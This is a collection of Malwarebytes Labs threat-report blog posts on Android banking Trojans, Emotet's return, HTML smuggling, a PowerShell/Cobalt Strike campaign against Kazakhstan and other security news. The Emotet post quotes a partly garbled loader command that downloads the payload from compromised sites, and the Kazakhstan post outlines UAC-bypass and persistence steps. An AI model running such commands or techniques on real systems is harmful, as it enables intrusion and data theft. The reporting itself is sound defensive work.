IT NEWS

SharkBot Android banking Trojan cleans users out

Researchers have discovered and analyzed a new Android banking Trojan that allows attackers to steal sensitive banking information such as user credentials, personal information, current balance, and even to perform gestures on the infected device.

According to the researchers, SharkBot demonstrates:

“…how mobile malwares are quickly finding new ways to perform fraud, trying to bypass behavioural detection countermeasures put in place by multiple banks and financial services during the last years.”

Type and source of the infection

A banking Trojan is a type of Trojan specifically created to harvest credentials and other sensitive financial and personal information stored and processed through online banking systems. This particular one, dubbed SharkBot by the researchers, goes beyond that, and uses uses an Automatic Transfer System (ATS) technique to automate the process of stealing funds from users’ accounts.

ATS allows attackers to automatically fill in fields on an infected device with minimal human input. It launches an autofill service to facilitate fraudulent money transfers through legitimate financial service apps. SharkBot uses this technique to bypass behavioral analytics, biometric checks, and multi-factor authentication (MFA).

SharkBot isn’t available in the Google Play Store, so the threat actors would have to convince victims to sideload the app on their device. Sideloading refers to installing an app onto the device by copying the APK installer onto the device and manually installing it on the system, i.e. bypassing the app store. On many devices, in order to sideload apps you would need to obtain root access on the phone, something that often results in users ‘bricking’ their phone or turning it into a $800 paper weight.

Apps like these are often offered for download masquerading as a media player, live TV, or data recovery apps.

Android Accessibility service

In order to use ATS, the Trojan needs access to the Android Accessibility Service. So once SharkBot is installed, the malware asks the users to grant it access to the Android Accessibility service, a feature designed to help physically impaired users interact with their devices by automating certain tasks. SharkBot uses the access to Accessibility Services to perform tasks such as:

  • Overlay attacks against multiple applications to steal login credentials and credit card information. Overlay attacks allow the threat actor to show fake benign pop-ups over dangerous ones. This allows them to deceive a victim user into clicking “through” them, performing a specific action (such as accepting a permission)
  • Intercept and/or hide SMS messages. This feature is mostly used by threat actors to get the MFA sent by the bank via text messages
  • Keylogging, for example to record and send typed passwords to the attacker
  • Obtain full remote control of an Android device
  • Bypass Android’s doze component and stay connected to the C2 servers

Once the malicious app has been installed, no icon is displayed on the device and SharkBot is able to get all the permissions needed thanks to the enabled Accessibility Services. This is done by clicking instantly on the popup shown to the user.

Targets

Analysis of the samples revealed 22 different targets, including international banks from the UK and Italy and five different cryptocurrency services. So far, infections have been found in the UK, Italy, and the United States. As the app appeared to be in the development stage, the number of targets is likely to grow over time.

Detection

SharkBot uses different anti-analysis and detection techniques, in particular:

  • Obfuscation to slow down the static analysis and “hide” all the commands and important information used by the malware
  • Anti-emulator. When the malicious application is installed on the device, it checks if the device is an emulator or a real phone
  • Modular in that it uses an external ATS module. Once installed, the malware downloads an additional module from the C2. The external module is a “.jar” file that contains all the functionality used to perform the ATS attacks. So this functionality can not be found when analyzing the apk
  • Hide the icon of the app from the device screen
  • Anti-delete. Like other malware, SharkBot uses the Accessibility Services to prevent the user from uninstalling the malicious application from in Settings
  • Encrypted communication. All the communication between the malware and C2 are encrypted and encoded with Base64. In addition to this, SharkBot uses a Domain Generator Algorithm (DGA).

Malwarebytes detects SharkBot as Android/Trojan.BankBot.SHRK.

Stay safe, everyone!

The post SharkBot Android banking Trojan cleans users out appeared first on Malwarebytes Labs.

SoNot SoSafe: Android malware disguises itself as secure messaging app

If you haven’t heard of SoSafe Chat, you will now.

This Android app, purported as a secure messaging application that uses end-to-end encryption, is the latest ruse cybercriminals put upon smartphone users, particularly those based in India, to infect their devices with GravityRAT, a piece of malicious software that is known to spy on people and steal their data.

According to Cyble Research Labs, the latest version of GravityRAT can now track locations of its targets, exfiltrate cellular network data, and record audio. Below is the complete list of GravityRAT’s malicious behavior:

  • Read SMS, call logs, and contacts data
  • Change or modify system settings
  • Read current cellular network information, the phone number and the serial number of the victim’s phone, the status of any ongoing calls, and a list of any phone accounts registered on the device
  • Read or write the files on the device’s external storage
  • Record audio
  • Get connected network information
  • Get the device’s location

The history of GravityRAT

This remote access Trojan (RAT) was first discovered in infected Windows computers in 2017 by the Indian Computer Emergency Response Team (CERT-IN), but it has been active since at least 2015. An advanced persistent threat (APT) group with origins in Pakistan was believed to be behind the creation and initial attacks using the RAT.

CERT-IN had described GravityRAT as “unlike most malware, which are designed to inflict short term damage. It lies hidden in the system that it takes over and keeps penetrating deeper. According to latest inputs, GravityRAT has now become self aware and is capable of evading several commonly used malware detection techniques.”

Knowing India and Pakistan’s longstanding historical and political conflict, it’s no surprise to see GravityRAT coming back to target high profile individuals in India once more. The first time threat actors attempted this was when they homed in on the Indian armed forces in 2018.

sosafe website
The SoSafe Chat website and download page hosted on sosafe[dot]co[dot]in, an Indian domain.

SoSafe markets itself as an encrypted message platform that worries about the security of its users.

SoSafe chat is not just another chat application, but an application that encrypts your messages whether it is text,images,voice notes,videos.”SoSafe” is available to talk to your loved ones when all the other applications secretly steal your chat data even when they say they do not. We at “SoSafe” ensure that the security of our customers remain our top priority. Be safe with “SoSafe”.

— SoSafe Chat website marketing blurb

BleepingComputer thinks that the above website “likely played a role in the distribution of the app”, and that users are likely get directed to it via malvertising and other known means like social media and instant messages.

It’s also likely that targeted users were messaged privately, since quick searches on top social media sites turned up empty.

How to stay safe

This is a good time to remind readers to never download apps from sites you haven’t heard about. It’s still much, much safer to download apps from the Google Play Store. Just make sure you enable Google Play Protect before you download apps.

Lastly, if you use an antivirus for your Android device, always make sure you are using the latest version.

Stay safe!

The post SoNot SoSafe: Android malware disguises itself as secure messaging app appeared first on Malwarebytes Labs.

When renting a hitman online goes horribly wrong

You might think looking up an illegal act online, and then visiting a website claiming to be all about doing said act, would be a huge mistake. Nobody would do this, right? Right?

It’s too wild to contemplate. You can barely move online for warnings about tracking or tracing. Even your web browser tells you when your activities aren’t hidden from your ISP or people running the network. As we’re about to see, lots of people simply don’t notice, or understand, such warnings. They just know they need someone to pay the price in a hurry.

As Europol said last week, some of the nastiest aspects in this realm lurk on the dark web – from threats of violence and exploitation, to drugs and criminal market services, they’re all there somewhere.

However…

Those folks I mentioned who don’t realise the massive problems they’re about to stumble into? They will go on the plain old internet and call up all manner of dubious sites and services without barely a second thought. Some will look for drugs. A few might want guns.

Others will take the elevator straight to the top floor of Disastrous Life Choices Incorporated.

Of websites and hitmen

A Michigan resident, Wendy Lynn Wein, has pleaded guilty and faces up to 9 years in prison for trying to have her ex-husband murdered via a hitman website. 

The hitman website was not in fact ready to cater to all her stealth assassination needs. It was a fakeout. Unbeknown to the would-be hitman hirer, she left a message of requirements along with a pseudonym.

This wasn’t enough to save her from the long arm of the law, however. The site owner contacted local law enforcement, and they sprang into action.

Shady meetings in a cafe might seem like a good idea, but probably not when the hitman sitting opposite you is an undercover detective. Wein explained what she wanted doing, and told the detective the potential victim’s work/home address and work schedule. She also offered up to $5,000 for the dirty deed, and then to seal the “Oh no, what have you done” deal handed over $200 as a downpayment.

A land of domain confusion: Part 1

I thought it’d be interesting to trace the legacy of the hitman website. How long had it been around for? Was it always used in this way? Unfortunately, things took a strange turn after digging into the URL mentioned on some news sites.

What I assumed was the hitman site has been around since at least 2004. Back then, it was redirected to a .(ru) domain. After that, it seems to have alternated between a blank page or one of those ad-laden search portals when the owner isn’t making use of the URL or it’s expired. It seems to have remained like that all the way up to the last couple of years. The final entry for the site on Internet Archive still shows an unused domain as recently as 2018.

There is no archiving of its most recent incarnation, most likely because the owner set it to not be indexed in some way (or it didn’t get scraped by the Archive’s crawlers in time).

Or, at least, that’s what I thought. Multiple news portals list the domain as rent-a-hitman(dot)com. That’s the URL I’ve just been describing via Internet Archive.

Guess what? That’s the wrong website!

A land of domain confusion: part 2

One news portal references some of the text from the alleged website and mentions a “point and click solution”, along with the site being compliant with the “Hitman Information Privacy and Protection Act of 1964”. This is a jokey reference to HIPPA, which many but the most observant of visitors would miss.

If you go hunting for this in various search engines, it returns the website rentahitman(dot)com. Notice the lack of hyphens! This is definitely the correct website.

It contains not only the HIPPA joke above, but lots of other fun features including a “merchandise coming soon” banner, the claim of more than “17,985 US based field operatives”, and the wonderful statement that “The dark web is not safe, but RAH is”. They even throw in a “Capisce”, just to stress the silliness of it all.

I did chuckle at the classic “Has your credit card been stolen on the internet” ad on the front page, complete with a fake card number entry box which simply redirects to the Internet Crime Complaint Center.

A slight diversion, then, but a good cautionary tale to make sure the URLs referenced in the news are the right ones. This seems even more important when talking about websites which may or may not provide assassination services.

The genesis of Rent A Hitman

How and why did this website come to be, you may ask. Well, this tale stretches back to at least July 2019. The creator, Bob Innes, set it up as a play on words (website page visit “hits”, as opposed to baffling acts of murder). After a while he had no use for it, and nobody wanting to purchase the URL. He bought the domain in 2005, so weirdly it isn’t that far off from the domain wrongly flagged as the genuine Rent a Hitman site.

Soon finding his email buried (best choice of words?) in hundreds of assassination requests, he took action on one in particular which seemed pretty insistent about having someone killed. A quick conversation with a law enforcement friend and an arrest later, and Rent a Hitman was suddenly in business as the Anti-Hitman Hitman Portal. Or something along those lines.

You’d think being so overt about the joke-laden website would ruin the objective of “save lives by preventing murders” and yet, as he notes, the requests keep rolling in. He’s able to direct dubious requests to law enforcement, and highlight how easily people will turn to bad actions at the same time.

That’s quite the talent, and it’s one we hope Bob will keep on using for a long time to come.

The post When renting a hitman online goes horribly wrong appeared first on Malwarebytes Labs.

TrickBot helps Emotet come back from the dead

Probably one of the best known threats for the past several years, Emotet has always been under intense scrutiny from the infosec community. On several occasions, it appeared to take an early retirement, but then again it was back.

However, when multiple law enforcement agencies seized control of its botnet and took it down in January 2021, confidence was much higher that Emotet and the people behind had finally called it quits. Not only had the infrastructure been dismantled, but previously infected computers had received a special update that would effectively remove the malware at a specific date.

Out of the woods again

On November 15, security researchers who’ve tracked Emotet announced that the threat was back. Emotet’s long-time partner in crime TrickBot was helping it out by using already infected machines to download the new Emotet binary.

To prove this was no hiccup, malspam campaigns distributing Emotet resumed as well with the classic Office document lures containing macros.

lures

These documents with extension .doc(m) and .xls(m) are the initial loader that will call out to one of several compromised websites to retrieve the Emotet payload proper using the following command:

C:WindowsSystem32cmd.exe C:WindowsSystem32cmd.exe c start B powershell $dfkj=$strs=http:visteme.mxshopwp-adminPP,https:newsmag.danielolayinkas.comcontentnVgyRFrTE68Yd9s6,http:av-quiz.tkwp-contentk6K,http:ranvipclub.netpvhkoa,https:g
traffic

After execution, Emotet will talk to its command and control (C2) servers and await further instructions.

A return of malspam waves and ransomware?

So far everything indicates that Emotet has restarted their successful enterprise. We should expect malspam campaigns to ramp up in the coming weeks.

In the past month, there have been a number of arrests against ransomware operators along with the creation of taskforces collaborating across borders. The return of Emotet could very well mean an increase in ransomware attacks.

Malwarebytes users are already protected against Emotet thanks to our anti-exploit layer blocking the malicious documents from downloading their payload.

Emotet

Indicators of Compromise (IOCs)

Emotet C2 servers:

103[.]75[.]201[.]2
103[.]8[.]26[.]102
103[.]8[.]26[.]103
104[.]251[.]214[.]46
138[.]185[.]72[.]26
178[.]79[.]147[.]66
185[.]184[.]25[.]237
188[.]93[.]125[.]116
195[.]154[.]133[.]20
207[.]38[.]84[.]195
210[.]57[.]217[.]132
212[.]237[.]5[.]209
45[.]118[.]135[.]203
45[.]142[.]114[.]231
45[.]76[.]176[.]10
51[.]68[.]175[.]8
58[.]227[.]42[.]236
66[.]42[.]55[.]5
81[.]0[.]236[.]93
94[.]177[.]248[.]64

The post TrickBot helps Emotet come back from the dead appeared first on Malwarebytes Labs.

Instagram’s memorialize feature abused to memorialize…Instagram’s boss

The mechanisms for memorialising the social network accounts of people who’ve died haven’t really suffered a lot of scrutiny up until now. I’ve done a fair amount of research on the processes and perils we face in the digitally deceased age.

Traditionally, the biggest issues in this space tended to be surprise returns from the beyond. When someone is definitely dead but their accounts spring back into action, it can be incredibly disturbing for their loved ones.

This happens by accident, or deliberately. Sometimes a relative with access to the account of the departed starts tweeting, or accidentally posts a message. Other times, the account is compromised and used to spam, or just troll.

A combination of weak security and the possibility of continued access to an account allows for this to happen.

What you may not be expecting, is for the process to happen in reverse.

When reports of your demise are rather premature…

What if you’re able to convince a platform that someone who is alive and well has actually passed on?

This issue has faced multiple individuals over the past month, but the tale has an additional twist: In this specific case, we don’t have a regular social media user finding out a random platform thinks they’ve died. We have the head of Instagram locked out of their own Instagram account, because somebody exploited its memorialisation feature.

Well, I promised you a twist.

What is Instagram’s memorialization feature?

Instagram’s memorialization feature is a way to preserve the digital legacy of a user for friends and family. As per Instagram’s FAQ page:

Memorialized accounts are a place to remember someone’s life after they’ve passed away. Memorialized accounts on Instagram have the following key features:

  • No one can log into a memorialized account.
  • The word Remembering will be shown next to the person’s name on their profile.
  • Posts the deceased person shared, including photos and videos, stay on Instagram and are visible to the audience they were shared with.
  • Memorialized accounts don’t appear in certain places on Instagram, like Explore.

Once memorialized, no one will be able to make changes to any of the account’s existing posts or information. This means no changes to the following:

  • Photos or videos added by the person to their profile.
  • Comments on posts shared by the person to their profile.
  • Privacy settings of their profile.
  • The current profile photo, followers or people the person follows.

This is one of the more strict, locked down approaches I’ve seen in this realm. Some sites allow people to continue posting, or make updates. This is particularly the case if the deceased is a known public figure, or the spokesperson for a person, charity or other organisation. In those cases, a close relative may be allowed to continue posting. That isn’t the case here, and the account is indeed memorialised in every sense of the word.

Checks and balances

Instagram doesn’t mention what checks it makes to ensure nothing suspicious takes place, but it does say it has fewer people available to review memorialization reports due to COVID. It’s possible this also impacted what happened next.

Fake memorial pages aren’t a new phenomenon. Convincing someone at an organisation that their reasonably public-facing boss is dead, feels a bit fresher.

This is the situation Adam Mosseri found himself in after a scammer convinced Instagram support that Mosseri was dead. All it took was a fake memorial, easily thrown together online or via the DIY route. As Instagram requires a death certificate or an obituary/news article, the latter was all it took to ease the scam through in September of this year.

The reports on this don’t say how long he was locked out for, except that it was resolved “quickly”.

For unverified, regular users, the person behind these tactics doesn’t even need to whip up a fake notice. They simply grab a recent genuine online obituary of somebody with the same name. As long as the obituary is from the same week as the bogus memorialization request, “98%” of the time it goes through within one to two days.

Paying the piper

This tactic does of course involve money, with “most requests” coming from paying customers. We don’t know if this particular incident was a paid request or just a way to make the tactic more visible. Getting people banned from services is another trick which was popular back in the days of Myspace, and it remains so to this day.

Discovering a contact online has died is a profound shock. If someone manages to switch an account to some form of memorial page, the impact is immediate for both people who see it and the person themselves.

Tightening up the process?

It’s possible services may have to become a little more strict about the evidence required for memorializing accounts. Perhaps more pieces of evidence, or genuine links online which corroborate the request. Of course, asking for specific services as proof only will likely exclude many people. What if those services are only available in certain regions? How about the cost…will folks be priced out in this new digital world of verified death?

It remains to be seen, but this story is a good reminder that scammers will target absolutely anything they can to get the job done. It’s up to the services we use to find new ways to be ever more vigilant and keep our digital identities ticking over for the time being.

The post Instagram’s memorialize feature abused to memorialize…Instagram’s boss appeared first on Malwarebytes Labs.

Evasive maneuvers: HTML smuggling explained

Microsoft Threat Intelligence Center (MSTIC) last week disclosed “a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features” that it calls HTML smuggling.

HTML smuggling has been used in targeted, spear-phishing email campaigns that deliver banking Trojans (such as Mekotio), remote access Trojans (RATs) like AsyncRAT/NJRAT, and Trickbot. These are malware that aid threat actors in gaining control of affected devices and delivering ransomware or other payloads.

MSTIC said the technique was used in a spear-phishing attack by the notorious NOBELIUM, the threat actor behind the noteworthy, nation-state cyberattack on SolarWinds.

How HTML smuggling works

microsoft Fig1 HTML smuggling overview
An overview of HTML smuggling (Source: Microsoft)

What is HTML smuggling?

HTML smuggling got its name from the way attackers smuggle in or hide an encoded malicious JavaScript blob within an HTML email attachment. Once a user receives the email and opens this attachment, their browser decodes the malformed script, which then assembles the malware payload onto the affected computer or host device.

Usually, malware payloads go through the network when someone opens a malicious attachment or clicks a malicious link. In this case, the malware payload is created within the host. This means that it bypasses email filters, which usually look for malicious attachments.

HTML smuggling is a particular threat to an organization’s network because it bypasses customary security mitigation settings aimed at filtering content. Even if, for example, an organization has disabled the automatic execution of JavaScript within its environment—this could stop the JavaScript blob from running—it can still be affected by HTML smuggling as there are multiple ways to implement it. According to MSTIC, obfuscation and the many ways JavaScript can be coded could evade conventional JavaScript filters.

HTML smuggling isn’t new, but MSTIC notes that many cybercriminals are embracing its use in their own attack campaigns. “Such adoption shows how tactics, techniques, and procedures (TTPs) trickle down from cybercrime gangs to malicious threat actors and vice versa … It also reinforces the current state of the underground economy, where such TTPs get commoditized when deemed effective.”

Some ransomware gangs have already started using this new delivery mechanism, and this could be early signs of a fledgling trend. Even organizations confident with their perimeter security are called to double back and take mitigation steps to detect and block phishing attempts that could involve HTML smuggling. As we can see, disabling JavaScript is no longer enough.

microsoft HTML smuggling email sample
A sample of an email that uses HTML smuggling. This is part of a Trickbot spear-phishing campaign. (Source: Microsoft)

Staying secure against HTML smuggling attacks

A layered approach to security is needed to successfully defend against HTML smuggling. Microsoft suggests killing the attack chain before it even begins. Start off by checking for common characteristics of HTML smuggling campaigns by applying behavior rules that look for:

  • an HTML file containing suspicious script
  • an HTML file that obfuscates a JS
  • an HTML file that decodes a Base64 JS script
  • a ZIP file email attachment containing JS
  • a password-protected attachment

Organizations should also configure their endpoint security products to block:

  • JavaScript or VBScript from automatically running a downloaded executable file
  • Running potentially obfuscated scripts
  • Executable files from running “unless they meet a prevalence, age, or trusted list criterion”

BleepingComputer recommends other mitigating steps, such as associating JavaScript files with a text editor like Notepad. This prevents the script from actually running but would let the user view its code safely instead.

Finally, organizations must educate their employees about HTML smuggling and train them on how to respond to it properly when encountered. Instruct them to never run a file that ends in either .js or .jse as these are JavaScript files. They should be deleted immediately.

Stay safe!

The post Evasive maneuvers: HTML smuggling explained appeared first on Malwarebytes Labs.

FBI server hijacked to send up to 100,000 bogus attack mails

If you received a scary missive from what appears to be from the FBI over the last few days, you’re not alone. The emails, which may have reached as many as 100,000 people, blamed a fictitious cyberattack on an innocent party. The mail read as follows:

Our intelligence monitoring indicates exfiltration of several of your virtualized clusters in a sophisticated chain attack. We tried to blackhole the transit nodes used by this advanced persistent threat actor, however there is a huge chance he will modify his attack with fastflux technologies, which he proxies trough [SIC] multiple global accelerators.

Now, if you know your way around your network or have some insight into security generally, this may already sound a little off. The typo also doesn’t help. But for anyone else, the email could be very concerning, not least because of the potential for reputation damage for them and their business!

How did this happen?

An FBI server was used to send out these mails. The server itself was a tiny link in the chain known as LEEP. This is a “secure platform for law enforcement agencies, intelligence groups, and criminal justice entities. It includes active shooter initiatives, blogs, forums, and a “Virtual Command Center”. Unfortunately, for a short period of time it also included bogus attack mail notifications.

The website contained a flaw which allowed for the leaking of one time registration passcodes in the website’s HTML. From there, it was a short step to editing requests sent to the browser and changing the text in the intended message subject field.

The FBI has explained the server was geared towards pushing notifications only. It isn’t part of the FBIs corporate email network, and so no PII or other data was compromised.

The damage could have been much worse

It’s certainly embarrassing for a law enforcement service to be abused in this way. It’s also worrying for anyone who’s received the mail and isn’t yet aware it’s a fake.

We’re just lucky the aim of the game here seems to have been trolling (unless you’re the innocent party, of course. There’s definitely nothing lucky about that). Think how much more impact this could have had if the mail had come with a malicious attachment, or was part of a social engineering data harvesting extravaganza.

Once an attacker seizes control of official law enforcement comms tools the possibility for incredibly malicious activity is high. This one is all about the short sharp shock, but there’s plenty of time to think about a slow, drawn-out campaign with subtle missives and a gradual tightening of the web.

Should you ever receive what appears to be a mail warning of attacks at your organisation from law enforcement, consider phoning up and going directly to the (assumed) source. It’ll save you a lot of stress, time, and effort.

The post FBI server hijacked to send up to 100,000 bogus attack mails appeared first on Malwarebytes Labs.

A week in security (Nov 8 – Nov 14)

Last week on Malwarebytes Labs

On Malwarebytes’ Lock and Code podcast episode S02E21 of this week we talked to Jess Dodson about “Why we fail at getting the cybersecurity basics right.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (Nov 8 – Nov 14) appeared first on Malwarebytes Labs.

The importance of backing up

What does backing up something mean?

Backing up is the act of making a copy or copies of a file. These files are stored somewhere other than where the originals are located. You may only need to back up a few files, or it might be a much bigger effort. Requirements may differ greatly depending on if you’re an individual or a business.

The idea is that if the original file is damaged, breaks, is stolen, or suffers any other problem, then the backups survive the issue.

In an age of ransomware attacks, it’s crucial to back up data and essential systems. Ransomware authors have been attacking all sorts of business verticals for years and anything from infrastructure to medical systems can be targets. There are many tales of law enforcement and hospitals locked out of mission critical files and systems, leading to potentially life threatening delays and scheduled operation setbacks.

What does backing up a device mean?

Backing up a device can mean a few things and depending on the device, you may have to be very specific when you map out this process. Sometimes, this can just mean backing up certain mobile settings and functions, or options and data settings for a PC.

It can also mean simply copying everything from a particular piece of equipment, as opposed to a few files or folders. This is very common for all forms of mobile devices and laptops. Backing up the entirety of a desktop PC is often a bit more involved due to the sheer number of files. With smartphones, the primary concern is often the vast collection of precious photographs they contain.

Where do we put our backups?

One of the most important backup stumbling blocks is figuring out where to place the files being copied. This can be done locally, on an external hard drive or local server on your network. The files can also be saved in the cloud. This can cause a few headaches depending on:

  • The security practices of the cloud storage system you’re using and
  • Whether you encrypt the files and folders before you upload them.

If the files are work related, you should be using the business approved storage / backup solution. Placing files in a randomly selected service of your choice can have disastrous consequences if sensitive files are hacked or leaked.

Do people backup their backups?

They do! It’s not unheard of to have a PC fail with important files on it, and discover there’s a problem with the backup too. This is why you have backups of backups. It’s also important to have sensible backups.

If an organisation simply copies hundreds of thousands of files into a big folder and thinks “job done”? That’s going to be a problem. If they suffer a ransomware attack 6 months later, it probably won’t end well: The files will be six months out of date and you’ll lose six months of work, or find yourself paying an exorbitant ransom. System files for business operations may have been replaced by new technology and the old files are no longer relevant.

If the files are still relevant but not organised in a way which makes it clear what to do with them, that’s also bad, and you’re back to square one. Did you back everything up in a logical, regular fashion but then leave the storage device next to the main systems which are all covered in flood water? That’s not going to help very much, either.

The 3-2-1 backup strategy

The best starting point for most businesses is the 3-2-1 backup strategy, in which you keep:

  1. Three copies of your data, in total.
  2. Two copies of your data on-site, but on different devices.
  3. One remote copy, in case your premises become damaged.

The local copies of your data give you easy and immediate, redundant access to your data when you need it. The remote copy, which will be harder to access, is your insurance policy against fire, flood, and other disasters. To act as a fallback if you are attacked with ransomware, the off-site copy of your data should be inaccessible to an attacker on your network with administrator rights.

Additional backup resources

You may wish to make a note in your diary now for World Backup Day which comes around every March. It’s a great reminder to set those backup plans in motion, and also do some more general file spring-cleaning while you’re at it. Whatever your strategy, the most important thing is to start backing up now. Not next week, most definitely not next month and almost certainly not “when I get around to it”.

There’s a lot of people out there who will sadly only realise the value of backups when it’s too late to do anything about it.

Getting backups right

Backups are simple in theory, but they often let you down when you need them most. On a recent Malwarebytes Lock and Code podcast, host David Ruiz spoke to Matt Crape, a technical account manager for VMware and backups expert, about why backups are so hard to get right, and what the most basic missteps are when companies roll out a backup plan.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

The post The importance of backing up appeared first on Malwarebytes Labs.

A multi-stage PowerShell based attack targets Kazakhstan

This blog post was authored by Hossein Jazi.

On November 10 we identified a multi-stage PowerShell attack using a document lure impersonating the Kazakh Ministry of Health Care, leading us to believe it targets Kazakhstan.

A threat actor under the user name of DangerSklif (perhaps in reference to Moscow’s emergency hospital) created a GitHub account and uploaded the first part of the attack on November 8.

In this blog we will review the different steps the attacker took to fly under the radar with the intent on deploying Cobalt Strike onto its victims.

Overview

The attack started by distributing a RAR archive named “Уведомление.rar” (“Notice.rar”). The archive file contains a lnk file with the same name pretending to be a PDF document from “Ministry of Health Care, Republic of Kazakhstan”. Upon opening the lnk file, a PDF file will be shown to confuse victims while in the background multiple stages of this attack are being executed. The decoy document is an amendment for a Covid 19 policy that has been issued by the Chef State Sanitary of the Republic of Kazakhstan.

decoy 2
Figure 1: Decoy document

Attack process

The following figure shows the overall process of this attack. The attack started by executing the lnk file that calls PowerShell to perform several techniques such as privilege escalation and persistency through an autorun registry key. We will provide the detailed analysis in the next section. 

cobalt
Figure 2: Attack Process

All stages of this attack have been hosted in one Github repository named GoogleUpdate. This repository was created on November 8th by a user named DangerSklif. The DangerSklif user was created on GitHub on November 1st. 

Screen Shot 2021 11 11 at 8.20.10 AM
Figure 3: GitHub repository

Analysis

The embedded lnk file is obfuscated and after de-obfuscation we can see that it used cmd.exe to call PowerShell to download and execute the first stage of the attack from the Github account (lib7.ps1).

lnk
Figure 4: lnk file

The lib7.ps1 downloads the decoy PDF file from the same Github account and stores it in the Downloads directory.  In the next step it opens the decoy PDF to confuse the user while it performs the rest of process in the background, which includes getting the OS version and downloading the next stage based on the OS version. 

lib7
Figure 5: lib7.ps1

If the OS version is 7 or 8, it downloads and executes lib30.ps1 and if the OS version is 10 it downloads and executes lib207.ps1. The reason the actor is checking the OS version is because it is trying to execute the right privilege escalation method. These techniques previously used by TA505 in their campaign to drop SrvHelper. 

  • Using the SilentCleanup task in the Task Scheduler to bypass UAC in Windows 10: Attacker used Lib207.ps1 to bypass UAC in Windows 10. The PowerShell commands used to perform the bypass are XOR encrypted using 0x58 key.
207 before deobfuscation
Figure 6: Lib207

After decrypting the commands, we can see the process of UAC bypass which includes creating a SilentCleanup task in the Task Scheduler that calls PowerShell to execute the created vbs file with higher privilege.

207 after deobfuscation
Figure 7: Lib207 after decryption
  • Using the sysprep.exe system utility and DLL side-loading to bypass UAC in Windows 7 and 8: Lib30.ps1 is used to execute this bypass. Simliar to lib207.ps1 this PowerShell script is also XOR encrypted but using different key (0x02).
lib30 before deobfuscation
Figure 8: Lib30

Figure 9 shows PowerShell commands after decryption. The process starts by creating a batch file (cmd.bat) in the “Windows/Temp” directory.  In the next step, a cab archive file is created containing a DLL (CRYPTBASE.dll for Windows 7 or shcore.dll for Windows 8. Then this cab file is extracted into the C:WindowsSystem32Sysprep directory using wusa.exe.

At the end, the sysprep.exe system utility launches which side loads the CRYPTBASE.dll for Windows 7 or shcore.dll for Windows 8. This DLL executes the created cmd.bat file which leads to executing it with a high privilege.

lib30 after deobfuscation 1
Figure 9: Lib30 after decryption

After bypassing UAC, in all OS versions the next stage payload is downloaded and executed (lib106.ps1).

This stage performs the following actions:

  • Creates a vbs file (cu.vbs) in ProgramFiles directory and makes this multi-stage attack persistence by adding this vbs file to HKLMSoftwareMicrosoftWindowsCurrentVersionRun registry key.  
  • Makes vbs file hidden using “Attrib.exe +h” command. 
  • Downloads and executes the final stage (updater.ps1) using PowerShell.
3ce06f2c c0ab 4248 a312 67d249de0eb8
Figure 10: lib106.ps1

The final stage (updater.ps1) is executing Cobalt Strike in PowerShell context. In fact this PowerShell script is PowerShell variant of Cobalt Strike.

36932c0f 974e 4f93 a792 8c5f01fdd600
Figure 11: updater.ps1

The Cobalt Strike ShellCode is base64 encoded and XOR encrypted using 35 key. After decoding and decrypting the ShellCode it allocates it into memory using VirtualAlloc and finally execute it by calling Invoke function.

cobalt 1
Figure 12: Updater.ps1 after de-obfuscation

Kazakhstan in the news

Kazakhstan has been in the news recently for taking over China in the cryptomining industry, depleting its own electric resources. The energy-rich country is a very important ally for Russia in particular with lucrative joint oil and gas ventures.

Other than their GitHub profile, we do not have much information on the threat actor or their exact intention with this attack. However, monitoring and espionage are a likely motive.

Malwarebytes users were protected thanks to the Anti-Exploit layer of our product.

block 1

IOCs

Уведомление.pdf.lnk:
574a33ee07e434042bdd1f59fc89120cb7147a1e20b1b3d39465cd6949ba7d99
Уведомление.rar:
d0f3c838bb6805c8a360e7b1f28724e73e7504f52147bbbb06551f91f0df3edb
Updater.ps1:
08f096134ac92655220d9ad7137e35d3b3c559359c238e034ec7b4f33a246d61
lib106.ps1:
81631df5d27761384a99c1f85760ea7fe47acc49ef81003707bb8c4cbf6af4be 
lib2.ps1:
912434caec48694b4c53a7f83db5f0b44b84ea79be57d460d83f21181ef1acbb
lib207.ps1:
893f6cac7bc1a1c3ee72d5f3e6994e902b5af044f401082146a486a0057697e5 
lib30.ps1:
11d6b0b76d057ac9db775d9a1bb14da2ed9acef325060d0452627d9391be4ea2 
lib63.ps1:
8f974d8d0741fd1ec9496857d7aabbe0d3ba4d2e52cc311c76c28396edae9eb9 
lib64.ps1:
301194613cbc11430d67acf7702fd15ec40ee0f9be348cf8a33915809b65bc5e
lib7.ps1:
026fcb13e9a4ea6c1eab73c892118a96731b868a1269f348a14a5087713dd9e5
lib706.ps1:
36aba78e63825ab47c1421f71ca02422c86c774ba525959f42b8e565a808a7d4 
C2:
188.165.148.241

The post A multi-stage PowerShell based attack targets Kazakhstan appeared first on Malwarebytes Labs.